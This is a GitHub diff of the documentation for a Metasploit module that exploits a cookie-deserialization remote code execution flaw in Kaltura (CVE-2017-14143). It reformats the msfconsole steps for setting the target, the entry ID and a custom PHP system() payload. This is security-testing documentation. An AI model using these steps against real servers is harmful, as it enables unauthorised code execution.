File tree Expand file tree Collapse file tree 1 file changed +8
-12
lines changed
documentation/modules/exploit/linux/http Expand file tree Collapse file tree 1 file changed +8
-12
lines changed Original file line number Diff line number Diff line change @@ -7,23 +7,19 @@ The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie
77
88 This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization.
99 Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143 .
10+ Installation of Kaltura is difficult, but here is an installation guide:
11+ https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md
1012
1113
1214## Verification Steps
1315
1416 1 . Start msfconsole
15- 2 . use exploit/linux/http/kaltura_unserialize_cookie_rce
16- 3 . set RHOST https://example.com (or IP address)
17- 4 . set ENTRYID 0_xxxxxxxx
18- 5 . set payload generic/custom
19- 6 . set payloadstr "system('command you want to execute, eg.- ls -la');"
20- 7 . run
21-
22-
23- ## Options
24-
25- default RPORT 4444
26-
17+ 2 . ` use exploit/linux/http/kaltura_unserialize_cookie_rce `
18+ 3 . ` set RHOST https://example.com (or IP address) `
19+ 4 . ` set ENTRYID 0_xxxxxxxx `
20+ 5 . ` set payload generic/custom `
21+ 6 . ` set payloadstr "system('command you want to execute, eg.- ls -la');" `
22+ 7 . ` run `
2723
2824## Scenarios
2925
You can’t perform that action at this time.
0 commit comments